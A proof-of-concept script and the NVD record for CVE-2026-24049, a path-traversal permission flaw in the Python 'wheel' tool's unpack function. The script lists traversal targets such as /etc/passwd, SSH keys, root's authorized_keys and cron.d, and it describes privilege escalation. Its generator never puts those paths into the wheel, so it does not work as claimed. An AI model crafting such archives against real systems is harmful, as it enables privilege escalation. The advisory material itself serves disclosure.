CVE-2026-24049

#!/usr/bin/env python3 """ CVE-2026-24049 PoC - Malicious wheel file generator This PoC demonstrates how an attacker can craft a malicious wheel file that modifies file permissions during extraction. Note: This is for educational and security research purposes only. """ import zipfile import io import os def create_malicious_wheel(): """ Create a malicious wheel file that attempts to modify /etc/passwd permissions """ # Create a wheel file (which is just a zip file) wheel_buffer = io.BytesIO() with zipfile.ZipFile(wheel_buffer, 'w', zipfile.ZIP_DEFLATED) as wheel: # WHEEL metadata wheel.writestr('WHEEL', ''' Wheel-Version: 1.0 Generator: malicious-poc Root-Is-Purelib: true Tag: py3-none-any ''') # METADATA wheel.writestr('METADATA', ''' Metadata-Version: 2.1 Name: malicious-package Version: 1.0.0 Description: Malicious package for CVE-2026-24049 demonstration ''') # RECORD file wheel.writestr('RECORD', '') return wheel_buffer.getvalue() def exploit_permission_modification(): """ Simulate the vulnerability where file permissions can be modified through path traversal in wheel extraction """ print("[*] CVE-2026-24049 - Wheel Permission Modification Vulnerability") print("[*] Target: wheel package versions 0.40.0 - 0.46.1") print("[*] This PoC demonstrates the permission modification vector") # The vulnerability allows modifying file permissions by crafting # wheel archives with paths like ../../etc/passwd malicious_paths = [ '../../etc/passwd', '../../../etc/ssh/ssh_host_rsa_key', '../../root/.ssh/authorized_keys', '../../../etc/cron.d/malicious' ] print("\n[*] Malicious paths that could be used:") for path in malicious_paths: print(f" - {path}") print("\n[*] Attack scenario:") print(" 1. Attacker creates malicious wheel file") print(" 2. Victim extracts wheel using vulnerable wheel version") print(" 3. The unpack function modifies permissions of target files") print(" 4. Attacker gains write access to sensitive system files") print(" 5. Attacker can escalate privileges or execute arbitrary code") if __name__ == '__main__': exploit_permission_modification() wheel_data = create_malicious_wheel() print(f"\n[*] Generated malicious wheel file: {len(wheel_data)} bytes")

{"cve": {"id": "CVE-2026-24049", "sourceIdentifier": "[email protected]", "published": "2026-01-22T05:16:23.157", "lastModified": "2026-02-18T14:56:48.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2."}, {"lang": "es", "value": "wheel es una herramienta de línea de comandos para manipular archivos wheel de Python, según se define en PEP 427. En las versiones 0.40.0 a 0.46.1, la función unpack es vulnerable a la modificación de permisos de archivos debido a un manejo incorrecto de los permisos de archivos después de la extracción. La lógica confía ciegamente en el nombre de archivo del encabezado del archivo comprimido para la operación chmod, a pesar de que el propio proceso de extracción podría haber saneado la ruta. Los atacantes pueden crear un archivo wheel malicioso que, al ser descomprimido, cambia los permisos de archivos críticos del sistema (por ejemplo, /etc /passwd, claves SSH, archivos de configuración), permitiendo la escalada de privilegios o la ejecución de código arbitrario al modificar scripts ahora escribibles. Este problema ha sido solucionado en la versión 0.46.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-732"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wheel_project:wheel:*:*:*:*:*:python:*:*", "versionStartIncluding": "0.40.0", "versionEndExcluding": "0.46.2", "matchCriteriaId": "977849BE-E1EA-4B60-AF30-9C248A8B9635"}]}]}], "references": [{"url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pypa/wheel/releases/tag/0.46.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}